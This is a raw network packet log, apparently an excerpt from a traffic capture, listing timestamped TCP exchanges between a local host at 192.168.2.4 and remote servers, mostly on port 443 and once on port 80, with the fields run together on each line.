                                                                                                                                                                    Dec 30, 2024 04:59:37.386569977 CET44349898142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.389556885 CET49898443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.389561892 CET44349898142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.437705994 CET44349899142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.437800884 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.437844038 CET44349897142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.437902927 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.438354015 CET44349899142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.438492060 CET44349897142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.438544035 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.438544035 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.439977884 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.439985991 CET44349899142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.440191031 CET44349899142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.440442085 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.440445900 CET44349897142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.440512896 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.440658092 CET44349897142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.440778971 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.440798044 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.440992117 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.487328053 CET44349897142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.487335920 CET44349899142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.528722048 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.528788090 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.529026985 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.529031992 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.529160976 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.529165030 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.797255993 CET44349898142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.797311068 CET49898443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.797324896 CET44349898142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.797368050 CET49898443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.797374964 CET44349898142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.797410965 CET49898443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.797418118 CET44349898142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.797444105 CET44349898142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.797460079 CET49898443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.797485113 CET49898443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.798012018 CET49898443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.798027992 CET44349898142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.802261114 CET44349899142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.802335978 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.802356005 CET44349899142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.802393913 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.802438974 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.802470922 CET44349899142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.802519083 CET49899443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.802906036 CET49901443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.802987099 CET44349901142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.802990913 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.803024054 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.803064108 CET49901443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.803091049 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.803519011 CET49901443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.803554058 CET44349901142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.803653002 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.803669930 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.806523085 CET44349897142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.806574106 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.806581974 CET44349897142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.806616068 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.806648970 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.806677103 CET44349897142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.806716919 CET49897443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.806976080 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.807003021 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.807064056 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.807205915 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:37.807215929 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.947566032 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.947613955 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.947640896 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.947649956 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.947658062 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.947686911 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.947690964 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.947721004 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.947724104 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.947752953 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.947765112 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.947786093 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.948123932 CET49900443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.948133945 CET44349900142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.948452950 CET49904443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.948493004 CET44349904142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:37.948553085 CET49904443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.948715925 CET49904443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:37.948726892 CET44349904142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.406790018 CET44349901142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.406853914 CET49901443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.407242060 CET49901443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.407269955 CET44349901142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.407279968 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.407346010 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.407401085 CET49901443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.407413006 CET44349901142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.408376932 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.408440113 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.411252022 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.411257029 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.411588907 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.411673069 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.412007093 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.420206070 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.420269966 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.420861006 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.421019077 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.422931910 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.422941923 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.423166990 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.423218966 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.423501968 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.459328890 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.467358112 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.554559946 CET44349904142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.554625034 CET49904443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.554881096 CET49904443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.554888010 CET44349904142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.555031061 CET49904443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.555036068 CET44349904142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.669063091 CET804974369.42.215.252192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.672208071 CET4974380192.168.2.469.42.215.252
                                                                                                                                                                    Dec 30, 2024 04:59:38.700297117 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.700474024 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.700572968 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.700716019 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.700727940 CET44349903142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.700737000 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.700781107 CET49903443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.701257944 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.701313019 CET44349906142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.701380014 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.701576948 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.701591969 CET44349906142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.718756914 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.719023943 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.719049931 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.719094038 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.719347000 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.719379902 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.719536066 CET44349902142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.719593048 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.719593048 CET49902443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.719861984 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.719932079 CET44349907142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.720000029 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.720177889 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:38.720211029 CET44349907142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.734867096 CET49901443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.734880924 CET49904443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.735272884 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.735358953 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.735671997 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.736351967 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.736380100 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.736460924 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.736737967 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.736769915 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:38.737051964 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:38.737060070 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.319813967 CET44349906142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.320900917 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.321238995 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.321249962 CET44349906142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.321392059 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.321396112 CET44349906142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.328524113 CET44349907142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.332909107 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.333205938 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.333226919 CET44349907142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.333348989 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.333362103 CET44349907142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.353396893 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.356935024 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.357172012 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.357203960 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.358824968 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.358839035 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.363220930 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.368910074 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.369159937 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.369164944 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.369302034 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.369307995 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.686697960 CET44349906142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.686747074 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.686760902 CET44349906142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.686800957 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.686866045 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.686896086 CET44349906142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.686948061 CET49906443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.687357903 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.687391043 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.687463045 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.687771082 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.687786102 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.702990055 CET44349907142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.703058958 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.703072071 CET44349907142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.703118086 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.703171968 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.703198910 CET44349907142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.703258038 CET49907443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.703751087 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.703778028 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.703835964 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.703984976 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:39.703994989 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.770999908 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.771038055 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.771054029 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.771061897 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.771085024 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.771104097 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.771116018 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.771157026 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.771189928 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.771207094 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.771727085 CET49909443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.771738052 CET44349909142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.772206068 CET49914443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.772228956 CET44349914142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.772285938 CET49914443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.772470951 CET49914443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.772483110 CET44349914142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.923904896 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.923944950 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.923970938 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.924041986 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.924068928 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.924077988 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.924107075 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.924127102 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.924602032 CET49908443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.924638033 CET44349908142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.924962997 CET49915443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.924988985 CET44349915142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:39.925041914 CET49915443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.925225019 CET49915443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:39.925241947 CET44349915142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.284137011 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.284198046 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.284780025 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.284828901 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.287789106 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.287801027 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.288008928 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.288888931 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.289160967 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.329593897 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.329659939 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.330230951 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.330287933 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.331335068 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.331784010 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.331790924 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.331988096 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.332036972 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.332406998 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.375334978 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.380743980 CET44349914142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.380963087 CET49914443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:40.381309986 CET49914443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:40.381316900 CET44349914142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.381448030 CET49914443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:40.381453037 CET44349914142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.532937050 CET44349915142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.533128977 CET49915443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:40.533365965 CET49915443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:40.533374071 CET44349915142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.533514023 CET49915443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:40.533519030 CET44349915142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.655627012 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.655838013 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.655930996 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.655961990 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.656066895 CET44349912142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.656152010 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.656193972 CET49912443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.656770945 CET49916443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.656795025 CET44349916142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.656884909 CET49916443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.657080889 CET49916443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.657092094 CET44349916142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.705136061 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.705192089 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.705219030 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.705238104 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.705293894 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.705310106 CET44349913142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:40.705319881 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.705355883 CET49913443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:40.705725908 CET49917443192.168.2.4142.250.181.238
